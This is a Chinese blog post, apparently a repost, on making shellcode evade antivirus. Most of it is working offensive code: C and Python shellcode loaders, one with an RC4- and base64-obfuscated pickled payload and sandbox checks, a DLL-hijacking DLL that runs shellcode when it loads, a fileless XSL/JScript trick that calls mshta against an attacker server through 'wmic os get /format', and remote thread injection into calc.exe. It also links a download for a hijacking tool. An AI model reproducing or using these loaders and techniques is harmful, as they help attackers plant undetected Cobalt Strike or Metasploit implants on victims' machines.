shellcode免杀「建议收藏」
shellcode免杀「建议收藏」
抱歉,分了几次写,顺序老乱了,下次内容多的还是文章分开写仔细点。
Something u have to know:
针对于不同环境,寻找可实行的免杀方法。这篇文章主要是分享思路(自己可以再加解密等混淆),初入shellcode免杀,以此让大家借鉴思路,发散思维,打造属于自己的免杀。
0x01 shellcode加载器
Ps:前段时间写了个PE加载器 -。- 差点跑题把代码贴过来了,留作下次分享(
下次一定)
1、回归正题我们先来看一个标准的shellcode加载器源代码:
先定义shellcode变量,调用VirtualAlloc为shellcode分配内存空间,然后用memcpy将shellcode拷贝到新分配的内存空间中,最后调用shellcode。
#include <stdio.h>
#include <windows.h>
using namespace std;
int main()
{
char shellcode[] = "把shellcode粘贴到这里";
LPVOID lpAlloc = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpAlloc, shellcode, sizeof shellcode);
((void(*)())lpAlloc)();
return 0;
}2、基于python的shellcode加载器的图片分离免杀
import base64,random,string,os
def GenPassword(length):
numOfNum = random.randint(1, length - 1)
numOfLetter = length - numOfNum
slcNum = [random.choice(string.digits) for i in range(numOfNum)]
slcLetter = [random.choice(string.ascii_letters) for i in range(numOfLetter)]
slcChar = slcNum + slcLetter
random.shuffle(slcChar)
getPwd = ''.join([i for i in slcChar])
return getPwd
def rc4_emain(key = "init_key", message = "init_message"):
s_box = rc4_einit_sbox(key)
crypt = str(rc4_eexcrypt(message, s_box))
return crypt
def rc4_einit_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_eexcrypt(plain, box):
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
cipher = "".join(res)
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
def rc4_main(key = "init_key", message = "init_message"):
s_box = rc4_init_sbox(key)
crypt = rc4_excrypt(message, s_box)
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_excrypt(plain, box):
plain = base64.b64decode(plain.encode('utf-8'))
plain = bytes.decode(plain)
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
cipher = "".join(res)
return cipher
rcts=GenPassword(13)
ahduiahsdi=GenPassword(6)+GenPassword(9)
a=os.popen('powershell Get-WmiObject Win32_PnPSignedDriver | findstr DeviceName | findstr PnP').read()
rcts1=GenPassword(15)
def lo():
import pickle
strinq = b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp'
asq = rc4_emain(rcts1, str(base64.b64decode(strinq), 'utf-8'))
adwqd = rc4_emain(rcts, "nihao")
code = b'gASVtAMAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFiVAwAACmltcG9ydCBjb2RlY3MsY3R5cGVzCmltcG9ydCBiYXNlNjQKICAgIAp3aXRoIG9wZW4ocidwYXlsb2FkLmpwZycsJ3JiKycpIGFzIGY6CiAgICBjb2RlPWYucmVhZCgpCmNvZGUgPWNvZGVjcy5lc2NhcGVfZGVjb2RlKGNvZGUpWzBdCmNvZGUgPSBieXRlYXJyYXkoY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NApwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQpidWYgPSAoY3R5cGVzLmNfY2hhciAqIGxlbihjb2RlKSkuZnJvbV9idWZmZXIoY29kZSkKc3RyaW5nPWInWTNSNWNHVnpMbmRwYm1Sc2JDNXJaWEp1Wld3ek1pNVNkR3hOYjNabFRXVnRiM0o1S0FvZ0lDQWdJQ0FnSUdOMGVYQmxjeTVqWDNWcGJuUTJOQ2h3ZEhJcExDQUtJQ0FnSUNBZ0lDQmlkV1lzSUFvZ0lDQWdJQ0FnSUdOMGVYQmxjeTVqWDJsdWRDaHNaVzRvWTI5a1pTa3BDaUFnSUNBcCcKZXZhbChzdHIoYmFzZTY0LmI2NGRlY29kZShzdHJpbmcpLCd1dGYtOCcpKQpoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgICAgICBjdHlwZXMuY19pbnQoMCksIAogICAgICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICAgICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICAgICAgY3R5cGVzLmNfaW50KDApLCAKICAgICAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpCikKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkpCgqUhZRSlC4='
eval(rc4_main(rcts1, asq))
if GenPassword(15) == 'asdasdasffjk':
print('True')
elif "Non" in a:
ahduiahs1 = GenPassword(6) + GenPassword(9)
if 'das' != GenPassword(7):
abd = GenPassword(7)
else:
abc = "dniasdhiuwhbed"
else:
lo()0x02 shellcode注入PE
1、dll劫持白加黑
1.1 创建一个执行shellcode的dll,可以对shellcode进行加解密操作
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include<windows.h>
#include<iostream>
HANDLE My_hThread = NULL;
unsigned char shellcode[] = "把shellcode粘贴到这里";
DWORD WINAPI ceshi(LPVOID pParameter)
{
__asm
{
mov eax, offset shellcode
jmp eax
}
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH://初次调用dll时执行下面代码
My_hThread = ::CreateThread(NULL, 0, &ceshi, 0, 0, 0);//新建线程
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern"C" _declspec(dllexport) void test()
{
int a;
a = 0;
}1.2 编译完成后可以用lordPE查看一下输出表中是否有test函数
shellcode免杀「建议收藏」
1.3 使用Stud_PE,随便选择一个PE的dll文件,将我们劫持dll中的test函数添置其中,并将我们dll放置同一目录即可,运行PE即上线
shellcode免杀「建议收藏」
2、利用工具(还是需要对dll再做免杀)
本处使用工具Dll(IAT),其中dll可单独做过免杀 工具下载网盘:链接:https://pan.baidu.com/s/1w8T5vgfGnIBU2Gkpq1kogQ 提取码:c29j
shellcode免杀「建议收藏」
含shellcode的dll将生成在工具目录下
shellcode免杀「建议收藏」
运行被劫持的文件即可上线!
注:会主动备份被劫持的文件,原文件命名为.exe~
0x03 不落地执行shellcode
此处以 利用wmic远程文件 为例:
1、msf生成的hta链接(最好也做下免杀,防止内存免杀)放入hta.xsl文件中,(其中JScript调用mshta运行恶意hta),并将文件放置攻击方服务器
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("mshta.exe http://xxx.xx.xx.xx:8080/9tHDoGtZF1DUtcm.hta");
]]> </ms:script>
</stylesheet>2、受害方通过wmic远程下载并加载服务器中的xsl,将自动运行xsl中恶意JScript代码
wmic os get /format:"http://xxx.xx.xx.xx:8080/hta.xsl"0x04 远程线程注入
注:一定要将MFC的使用选为在静态库中使用MFC,防止出现缺少依赖
#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include "iostream"
//隐藏运行程序时的cmd窗口
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
using namespace std;
//使用CS或msf生成的C语言格式的上线shellcode
unsigned char shellcode[] = "把shellcode粘贴到这里";
BOOL injection()
{
wchar_t Cappname[MAX_PATH] = { 0 };
STARTUPINFO si;
PROCESS_INFORMATION pi;
LPVOID lpMalwareBaseAddr;
LPVOID lpnewVictimBaseAddr;
HANDLE hThread;
DWORD dwExitCode;
BOOL bRet = FALSE;
//把基地址设置为自己shellcode数组的起始地址
lpMalwareBaseAddr = shellcode;
//获取系统路径,拼接字符串找到calc.exe的路径
GetSystemDirectory(Cappname, MAX_PATH);
_tcscat(Cappname, L"\\calc.exe");
//打印注入提示
// printf("被注入的程序名:%S\r\n", Cappname);
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
//创建calc.exe进程
if (CreateProcess(Cappname, NULL, NULL, NULL,
FALSE, CREATE_SUSPENDED//CREATE_SUSPENDED新进程的主线程会以暂停的状态被创建,直到调用ResumeThread函数被调用时才运行。
, NULL, NULL, &si, &pi) == 0)
{
return bRet;
}
//在
lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
, NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (lpnewVictimBaseAddr == NULL)
{
return bRet;
}
//远程线程注入过程
WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,
(LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);
hThread = CreateRemoteThread(pi.hProcess, 0, 0,
(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);
WaitForSingleObject(pi.hThread, INFINITE);
GetExitCodeProcess(pi.hProcess, &dwExitCode);
TerminateProcess(pi.hProcess, 0);
return bRet;
}
void help(char* proc)
{
// printf("%s:创建进程并将shellcode写入进程内存\r\n", proc);
}
int main(int argc, char* argv[])
{
help(argv[0]);
injection();
}发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171423.html原文链接:https://javaforall.cn
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
